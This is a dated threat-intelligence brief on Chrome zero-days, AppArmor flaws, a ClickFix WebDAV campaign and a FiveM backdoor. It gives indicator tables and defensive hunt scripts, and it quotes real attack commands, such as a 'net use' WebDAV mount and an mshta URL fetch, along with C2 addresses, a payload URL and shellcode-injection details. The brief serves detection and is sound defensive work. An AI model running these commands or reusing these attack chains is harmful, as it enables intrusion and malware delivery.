Cyber Threat Brief — March 15 2026
1. Google Chrome Dual Zero-Days (CVE-2026-3909 & CVE-2026-3910) — CISA KEV
Summary
Google patched two high-severity Chrome zero-days on March 12-13 that are confirmed actively exploited in the wild. Both bugs were discovered internally and added to CISA’s KEV catalog on March 13 — federal agencies have until March 27 to patch. One hits Skia’s 2D graphics library (out-of-bounds write), the other hits the V8 JavaScript engine (inappropriate implementation enabling sandbox escape). This is Chrome’s third actively weaponized zero-day of 2026.
What’s New (Last 24 Hours)
- CISA added both CVE-2026-3909 and CVE-2026-3910 to the Known Exploited Vulnerabilities catalog on 2026-03-13, requiring FCEB patch by 2026-03-27
- Google confirmed: “exploits for both CVE-2026-3909 and CVE-2026-3910 exist in the wild”
- Aviatrix TRC analysis (March 14) confirmed attacker chains linking CVE-2026-3909 → CVE-2026-3910 for RCE + privilege escalation before lateral movement
- Microsoft Edge, Brave, Opera, and Vivaldi users need vendor-specific updates as Chromium-based browsers share the vulnerable code paths
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| Chrome versions below 146.0.7680.75/76 (Win/macOS) or 146.0.7680.75 (Linux) | Vulnerable Software | T1203 | EDR software inventory / asset mgmt | Alert on or block execution of outdated Chrome builds; enforce update via policy |
| Crafted HTML page delivery via browser | TTP | T1189 | Web proxy / DNS logs | Hunt for anomalous browser child processes spawned after visiting external URLs |
| Unexpected browser child process execution | TTP | T1203 | EDR process telemetry | Alert on chrome.exe or msedge.exe spawning unexpected child processes (cmd, powershell, wscript) |
| Out-of-bounds write in Skia (CVE-2026-3909) | Exploit Mechanism | T1203 | Crash reports / browser telemetry | Correlate crash telemetry from Skia renderer with subsequent suspicious child processes |
| Sandbox escape via V8 inappropriate impl (CVE-2026-3910) | Exploit Mechanism | T1203 | EDR / browser sandbox telemetry | Monitor for renderer processes making unexpected system calls outside sandbox boundaries |
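The first and third rows of the table above as runnable hunt logic, added here as an example (not Google, CISA or vendor code): a build-number check against the first fixed Chrome release and a browser-parent filter over EDR process events. The event keys (parent_image, image, cmdline) and the hostname-to-build inventory are constructed assumptions.

```python
"""Chrome CVE-2026-3909/3910 hunts from the table above (added example, not
vendor code). Assumes EDR process events as dicts with the constructed keys
parent_image / image / cmdline, and an inventory of hostname -> Chrome build."""

# First fixed build on every platform in the brief (Win/macOS also ship .76).
FIXED_CHROME = (146, 0, 7680, 75)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_version(text):
    """'146.0.7680.74' -> (146, 0, 7680, 74); rejects anything not a 4-part build."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Chromium build string: {text!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable_chrome(version):
    """True when the installed build predates the first fixed release."""
    return parse_version(version) < FIXED_CHROME


def outdated_hosts(inventory):
    """Hostnames still running a pre-fix build, sorted for stable reporting."""
    return sorted(host for host, build in inventory.items() if is_vulnerable_chrome(build))


def suspicious_browser_children(events):
    """(parent, child, cmdline) for every browser process that spawned a script host."""
    hits = []
    for ev in events:
        parent, child = ev["parent_image"].lower(), ev["image"].lower()
        if parent in BROWSERS and child in SCRIPT_HOSTS:
            hits.append((parent, child, ev["cmdline"]))
    return hits


# Constructed sample telemetry, not from a real incident.
SAMPLE_INVENTORY = {"host-a": "146.0.7680.74", "host-b": "146.0.7680.75",
                    "host-c": "146.0.7680.76", "host-d": "145.0.7632.120"}
SAMPLE_EVENTS = [
    {"parent_image": "chrome.exe", "image": "powershell.exe", "cmdline": "powershell.exe -NoProfile -w hidden"},
    {"parent_image": "chrome.exe", "image": "chrome.exe", "cmdline": "chrome.exe --type=renderer"},
    {"parent_image": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe"},
]

if __name__ == "__main__":
    print("outdated Chrome:", outdated_hosts(SAMPLE_INVENTORY))
    for hit in suspicious_browser_children(SAMPLE_EVENTS):
        print("ALERT browser child process:", hit)
```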
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | None found | No direct Splunk ESCU rule for Chrome Skia/V8 exploitation. Supplement with EDR-based browser child process alerting and vulnerable software inventory searches. |
| Elastic | Suspicious Browser Child Process | Fires when Chrome/Edge spawns unusual child processes — directly relevant to post-exploitation behavior following CVE-2026-3909/3910 sandbox escape on macOS. |
| Sigma | Suspicious Browser Child Process - MacOS | Covers anomalous child process creation from browser processes, mapping to post-exploitation spawning after Skia/V8 exploitation. |
2. CrackArmor — Nine AppArmor Flaws Enable Local Root on 12.6M Linux Systems
Summary
Qualys TRU disclosed nine confused-deputy vulnerabilities in Linux’s AppArmor security module on March 12, 2026. Dubbed “CrackArmor,” the flaws have existed since kernel v4.11 (2017) and affect Ubuntu, Debian, SUSE, and cloud/Kubernetes/edge deployments. An unprivileged local user can manipulate security profiles via pseudo-files, bypass user-namespace restrictions, trigger kernel stack exhaustion (kernel panic on x86-64), and bypass KASLR via out-of-bounds reads. No CVE IDs yet — the upstream kernel process delays assignment by 1-2 weeks post-patch. Qualys developed working PoCs and shared them with vendors; public release is withheld. The X community is already publishing Sigma-based detection via owLSM.
What’s New (Last 24 Hours)
- Qualys blog published March 12-13 with full technical breakdown confirming root escalation via Sudo/Postfix tool interactions
- Community detection response emerging: @SilverPlate3x published Sigma rules via owLSM (kernel-level Sigma rule engine) specifically targeting CrackArmor exploitation patterns
- Qualys recommends monitoring /sys/kernel/security/apparmor/ for unauthorized profile modifications as an exploitation indicator
- Scope: 12.6M+ enterprise Linux instances with AppArmor enabled by default (Ubuntu, Debian, SUSE, cloud platforms)
- No CVE IDs assigned yet — patch tracking requires advisory/kernel version tracking, not CVE lookup
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| /sys/kernel/security/apparmor/ write events by non-root processes | File System TTP | T1548.001 | Linux auditd / EDR file monitoring | Alert on writes to AppArmor pseudo-file paths by unprivileged UIDs; baseline normal values first |
| Unprivileged process spawning with elevated capabilities after AppArmor profile modification | TTP | T1068 | EDR process telemetry / auditd | Hunt for unexpected capability grants (CAP_SYS_ADMIN) following profile manipulations |
| sudo or postfix process interaction with AppArmor profile paths | TTP | T1548.001 | EDR / auditd syscall log | Detect confused-deputy: low-privilege processes using high-privilege tools (sudo/postfix) to manipulate profiles |
| Kernel panic / unexpected reboot after deep AppArmor subprofile removal | DoS TTP | T1499.004 | Syslog / kernel crash logs | Alert on kernel panics on x86-64 systems; correlate with prior AppArmor operations via auditd |
| KASLR info leak via out-of-bounds read on AppArmor pseudo-file | TTP | T1083 | Linux auditd reads on /sys/kernel/security/apparmor/ | Monitor for bulk OOB read patterns on sysfs AppArmor entries from non-privileged contexts |
| Containers or Kubernetes pods with AppArmor profile disabled/modified | TTP | T1611 | Kubernetes audit logs / container runtime logs | Alert on pods that disable AppArmor profile or switch to unconfined runtime during execution |
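The first row of the table above (non-root writes into the AppArmor pseudo-file tree) as detection logic over auditd output, added here as an example and not Qualys or owLSM code. It assumes an auditd watch of the form `-w /sys/kernel/security/apparmor/ -p wa -k apparmor-write`, so that every recorded event is a write or attribute change, and the audit records in SAMPLE_AUDIT are constructed.

```python
"""Flag non-root writes under /sys/kernel/security/apparmor/ in auditd logs
(added example; not Qualys or owLSM code). Assumes the watch
  -w /sys/kernel/security/apparmor/ -p wa -k apparmor-write  (SAMPLE_AUDIT is constructed)."""
import re
from collections import defaultdict

APPARMOR_ROOT = "/sys/kernel/security/apparmor/"
# The ":901" in msg=audit(ts:901) is the event serial shared by all records of one syscall.
_SERIAL = re.compile(r"msg=audit\(\d+\.\d+:(\d+)\)")
_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_record(line):
    """One auditd line -> dict of fields (quotes stripped) plus its serial, or None."""
    m = _SERIAL.search(line)
    if not m:
        return None
    rec = {k: v.strip('"') for k, v in _FIELD.findall(line)}
    rec["serial"] = m.group(1)
    return rec

def group_events(lines):
    # Reassemble SYSCALL + PATH records into events keyed by serial.
    events = defaultdict(list)
    for line in lines:
        rec = parse_record(line)
        if rec:
            events[rec["serial"]].append(rec)
    return events

def apparmor_writes_by_unprivileged(lines):
    """(serial, uid, comm, path) for each AppArmor pseudo-file touched by a non-root uid."""
    hits = []
    for serial, recs in group_events(lines).items():
        sysc = next((r for r in recs if r.get("type") == "SYSCALL"), None)
        if sysc is None or sysc.get("uid") == "0":
            continue  # root loading profiles (apparmor_parser) is expected; baseline the rest
        for path_rec in (r for r in recs if r.get("type") == "PATH"):
            name = path_rec.get("name", "")
            if name.startswith(APPARMOR_ROOT):
                hits.append((serial, sysc["uid"], sysc.get("comm"), name))
    return hits

SAMPLE_AUDIT = [  # constructed records; syscall 257 is openat on x86-64
    'type=SYSCALL msg=audit(1773500000.101:901): arch=c000003e syscall=257 success=yes exit=3 uid=1000 auid=1000 comm="python3" exe="/usr/bin/python3" key="apparmor-write"',
    'type=PATH msg=audit(1773500000.101:901): item=0 name="/sys/kernel/security/apparmor/.replace" inode=12 mode=0100200 ouid=0 nametype=NORMAL',
    'type=SYSCALL msg=audit(1773500000.202:902): arch=c000003e syscall=257 success=yes exit=4 uid=0 auid=0 comm="apparmor_parser" exe="/sbin/apparmor_parser" key="apparmor-write"',
    'type=PATH msg=audit(1773500000.202:902): item=0 name="/sys/kernel/security/apparmor/.load" inode=11 mode=0100200 ouid=0 nametype=NORMAL',
    'type=SYSCALL msg=audit(1773500000.303:903): arch=c000003e syscall=257 success=yes exit=3 uid=1000 comm="cat" exe="/usr/bin/cat"',
    'type=PATH msg=audit(1773500000.303:903): item=0 name="/etc/hostname" inode=99 mode=0100644 ouid=0 nametype=NORMAL',
]
```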
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | Linux pkexec Privilege Escalation | Covers a similar confused-deputy LPE pattern (privileged tool abuse) — useful analog while CrackArmor-specific rules are developed; monitors unexpected pkexec executions that could indicate toolchain abuse. |
| Elastic | Kernel Load or Unload via Kexec Detected | Detects kernel manipulation attempts; relevant for monitoring kernel-level exploitation follow-on activity after AppArmor bypass achieves root. Kubernetes Privileged Pod Created covers container escape escalation path via CrackArmor container isolation bypass. |
| Sigma | Privileged Container Deployed | Detects creation of privileged Kubernetes pods — directly relevant to CrackArmor’s container isolation bypass vector where AppArmor profile manipulation removes pod confinement. |
3. ClickFix Evolution — WebDAV + Trojanized Electron App Bypasses Defender
Summary
A new ClickFix variant documented on March 14 replaces the usual PowerShell/mshta stage with a net use WebDAV drive mapping, then executes a trojanized WorkFlowy Electron application with malicious logic injected into the app.asar archive. The campaign bypassed Microsoft Defender for Endpoint entirely — Atos researchers only caught it via behavioral threat hunting on the RunMRU registry key. A parallel campaign tracked by @inf0stache (March 14) shows a separate ClickFix chain delivering XOR+AES-encrypted Donut shellcode that injects a .NET assembly into explorer.exe. Two flavors, same social engineering lure, both requiring defender teams to hunt on behavioral signals rather than signatures.
What’s New (Last 24 Hours)
- Atos TRC published full technical breakdown on March 14 — first documented ClickFix variant using net use WebDAV as delivery mechanism, evading all standard EDR script-execution detections
- Malicious WorkFlowy v1.4.1050 (signed by FunRoutine Inc.) distributes with backdoored resources/app.asar; legitimate app signed, malicious logic hidden in Node.js entry point main.js
- C2 confirmed at 94.156.170[.]255 (WebDAV server), ZIP payload at https://94.156.170[.]255/flowy.zip
- Lure domain: happyglamper[.]ro (fake CAPTCHA / Win+R prompt)
- RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) captures user-executed commands including the WebDAV mount — key hunt pivot for this campaign
- Parallel campaign (inf0stache analysis): ClickFix → mshta → PowerShell → XOR+AES decrypt (SHA256 key derivation with salt+“kizo”) → Donut x64 shellcode → .NET assembly injected into explorer.exe with TripleDES-encrypted C2 config
- Infosecurity Magazine reports WordPress-delivered ClickFix delivering Vidar Stealer, Impure Stealer, Vodka Stealer, and Double Donut payloads (March 13)
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| cmd.exe /c net use Z: https://94.156.170[.]255/webdav /persistent:no | Command Line | T1059.003 | EDR process telemetry | Alert on net use with HTTPS WebDAV paths — especially with /persistent:no flag followed by immediate script execution |
| 94.156.170[.]255 | IP IOC | T1105 | Firewall / proxy / DNS logs | Block and alert on outbound connections to this IP; also block WebDAV (port 443) to untrusted hosts |
| happyglamper[.]ro | Domain IOC | T1566.002 | DNS logs / web proxy | Block/alert on DNS queries and HTTP/S connections to this domain |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU | Registry Key | T1204.001 | EDR registry telemetry | Hunt RunMRU for net use entries with external HTTPS paths — reliable behavioral indicator for this ClickFix flavor |
| %LOCALAPPDATA%\MyApp\WorkFlowy.exe / resources\app.asar (v1.4.1050) | File Path | T1059.007 | EDR file telemetry | Alert on WorkFlowy.exe writing/reading app.asar files to non-standard paths; monitor Electron apps in %LOCALAPPDATA% |
| PowerShell Invoke-WebRequest downloading ZIP then Expand-Archive to %LOCALAPPDATA% | TTP | T1105 | EDR / PowerShell script block logging | Alert on PowerShell download followed by Expand-Archive to user-writable directories |
| XOR+AES-CBC decrypt with SHA256 key from salt + hardcoded “kizo” | Obfuscation TTP | T1027.013 | EDR memory / AV sandbox | Hunt for multi-layer crypto decryption patterns in PowerShell or .NET processes at runtime |
| Donut x64 shellcode injected into explorer.exe | TTP | T1055.001 | EDR memory injection telemetry | Alert on explorer.exe receiving remote thread creation from non-system processes |
| .NET assembly loaded reflectively into explorer.exe | TTP | T1055.002 | EDR memory telemetry | Detect reflective PE injection into explorer.exe; watch for SmtpClient-related network calls from this process |
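The RunMRU hunt from the table above as runnable logic, added here as an example and not Atos code: it walks the key's values in MRUList order, strips Explorer's trailing `\1` marker, and flags both the WebDAV `net use` stage and the classic mshta/PowerShell-fetches-a-URL stage of the parallel campaign. The input is the value dict as exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; SAMPLE_RUNMRU is constructed and uses an RFC 5737 documentation address rather than the campaign IP.

```python
"""Hunt RunMRU for the ClickFix stages in this brief: a WebDAV mount via net use,
or a script host fetching a remote URL (added example; not Atos code). Input is the
value dict read from HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU."""
import re

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.I)
# Windows WebDAV UNC forms: \\host@SSL\share or \\host@443\share
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:ssl|\d+)\\", re.I)
NET_USE = re.compile(r"\bnet1?(?:\.exe)?\s+use\b", re.I)
SCRIPT_HOST = re.compile(r"\b(?:mshta|powershell|pwsh|curl|msiexec)(?:\.exe)?\b", re.I)

def runmru_in_order(values):
    """Yield (value_name, command) most-recent first, stripping the trailing '\\1' Explorer appends."""
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            yield name, raw[:-2] if raw.endswith("\\1") else raw

def classify(command):
    """Reasons this Run-dialog command matches the brief's indicators (empty list if none)."""
    reasons = []
    remote = REMOTE_URL.search(command) or WEBDAV_UNC.search(command)
    if NET_USE.search(command) and remote:
        reasons.append("net use to WebDAV path")
        if "/persistent:no" in command.lower():
            reasons.append("/persistent:no (transient mount)")
    elif SCRIPT_HOST.search(command) and REMOTE_URL.search(command):
        reasons.append("script host fetching remote URL")
    return reasons

def hunt_runmru(values):
    """[(value_name, command, reasons)] for every RunMRU entry worth an analyst's look."""
    hits = []
    for name, cmd in runmru_in_order(values):
        reasons = classify(cmd)
        if reasons:
            hits.append((name, cmd, reasons))
    return hits

SAMPLE_RUNMRU = {  # constructed; 203.0.113.10 is an RFC 5737 documentation address
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta https://203.0.113.10/verify.hta\\1",
    "c": "cmd.exe /c net use Z: https://203.0.113.10/webdav /persistent:no\\1",
}

if __name__ == "__main__":
    for name, cmd, reasons in hunt_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU[{name}]: {cmd}  <- {', '.join(reasons)}")
```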
Potential Detection Coverage Based on MITRE ATT&CK Technique
4. Blum Panel — FiveM Gaming Backdoor Fully Reverse-Engineered, 3,856 Servers Infected
Summary
A 16-hour investigation (March 13-14) by Justice Gaming Network fully reversed the Blum Panel, a commercial FiveM backdoor sold for €59.99/month that provides paying customers full remote control over infected GTA:Online roleplay servers. The C2 at 185.87.23.198 was infiltrated without authentication, exposing a database of 3,856 infected servers, 289 players’ PII (real IPs, Discord IDs, Steam IDs), and 7 pre-built RCE payloads. Detection is straightforward: check for GlobalState.miauss and GlobalState.ggWP globals in server console. Built on stolen Cipher Panel code.
What’s New (Last 24 Hours)
- Full deobfuscated source code, C2 database (sanitized), and payload library published to GitHub on March 14
- C2 server identified: 185.87.23.198 (Active 1 GmbH, Hamburg, Germany) — no authentication required to extract full database
- Payload library contains 7 pre-built RCE scripts deployable against any connected FiveM server
- 28 paying customers identified from billing records
- Detection confirmed: GlobalState.miauss (dropper) and GlobalState.ggWP (replicator) are active infection indicators in FiveM server console
- block_c2.sh script published to immediately block the C2 IP
- Second product (GFX Panel) identified on same unprotected infrastructure
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| 185.87.23.198 | C2 IP | T1219 | Firewall / network logs | Block outbound to this IP immediately; alert on any established connections from FiveM server hosts |
| GlobalState.miauss | In-Memory Indicator | T1059.007 | FiveM server console logs | Run if GlobalState.miauss then print("DROPPER ACTIVE") end in console; presence confirms active infection |
| GlobalState.ggWP | In-Memory Indicator | T1059.007 | FiveM server console logs | Run if GlobalState.ggWP then print("REPLICATOR ACTIVE") end; presence confirms replication component active |
| Blum Panel / GFX Panel domains | Domain IOCs | T1219 | DNS logs | Block/alert on DNS queries to panel domains; check evidence/infected_servers_sanitized.json for server names |
| Obfuscated JavaScript with multiple decode layers | TTP | T1027.002 | File analysis / AV sandbox | Scan FiveM resources/ directories for obfuscated JS files with unusual entropy; run scanner from repo |
| RCE payload delivery via API key to any connected server | TTP | T1059.007 | FiveM server console / resource logs | Monitor for unexpected resource loading or execution from authenticated API calls |
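The "scan FiveM resources/ directories for obfuscated JS files with unusual entropy" row above as a runnable heuristic, added here as an example and not the Justice Gaming Network scanner: Shannon entropy per script plus a count of stacked decode primitives, which also catches the "multiple decode layers" pattern in Lua. SAMPLE_TREE contents and both thresholds are constructed starting points to baseline against known-good resources.

```python
"""Heuristic scan of a FiveM resources/ tree for obfuscated scripts, as the table
above suggests (added example; not the Justice Gaming Network scanner). Flags
high Shannon entropy or stacked decode primitives; SAMPLE_TREE is constructed."""
import math
import re
from collections import Counter

SCRIPT_EXT = (".js", ".lua")
# Decode/eval primitives that obfuscators chain; two or more in one file is suspicious.
DECODE_MARKERS = [r"\beval\s*\(", r"\bFunction\s*\(", r"\batob\s*\(", r"String\.fromCharCode",
                  r"\bunescape\s*\(", r"\bload\s*\(", r"\bloadstring\s*\(", r"string\.char\s*\("]
ENTROPY_THRESHOLD = 5.2   # bits per char; readable source code sits well below this
MARKER_THRESHOLD = 2      # both thresholds are starting points: baseline on known-good resources

def shannon_entropy(text):
    """Bits of entropy per character; 0.0 for an empty file."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def decode_layers(text):
    """How many decode/eval primitives appear; a count, not a nesting depth."""
    return sum(len(re.findall(p, text)) for p in DECODE_MARKERS)

def assess(path, text):
    """Finding dict for one script, or None when neither heuristic fires."""
    ent, layers = shannon_entropy(text), decode_layers(text)
    if ent >= ENTROPY_THRESHOLD or layers >= MARKER_THRESHOLD:
        return {"path": path, "entropy": round(ent, 2), "decode_layers": layers}
    return None

def scan_tree(files):
    """files: {relative_path: contents}, e.g. built with os.walk over the server root.
    Only .js/.lua under resources/ are examined; server.cfg and the like are skipped."""
    findings = []
    for path, text in sorted(files.items()):
        if path.startswith("resources/") and path.endswith(SCRIPT_EXT):
            finding = assess(path, text)
            if finding:
                findings.append(finding)
    return findings

SAMPLE_TREE = {  # constructed contents, not taken from the Blum Panel
    "resources/esx_core/server/main.lua": "RegisterNetEvent('esx:ready')\nAddEventHandler('esx:ready', function()\n  print('ready')\nend)\n",
    "resources/ui/html/app.js": "var _0x1f=['aGVsbG8='];eval(Function(atob(_0x1f[0]))());String.fromCharCode(104);\n",
    "server.cfg": "eval( Function( atob(",
}
```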
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | None found | No direct Splunk ESCU detection for FiveM/gaming platform backdoors. Use network detection (firewall blocks on 185.87.23.198) and server-side script monitoring as primary controls. |
| Elastic | Network Traffic to Rare Destination Country | ML-based anomaly detection that would fire on unexpected outbound traffic to Germany (Active 1 GmbH) from gaming server infrastructure if Germany is not a normal destination. |
| Sigma | Local Network Connection Initiated By Script Interpreter | Partially applicable — covers script interpreter network connections; adapt for FiveM’s Node.js/V8 runtime making outbound calls to C2. Primary detection is IOC-based (IP/domain blocklist) and console-side indicator checks. |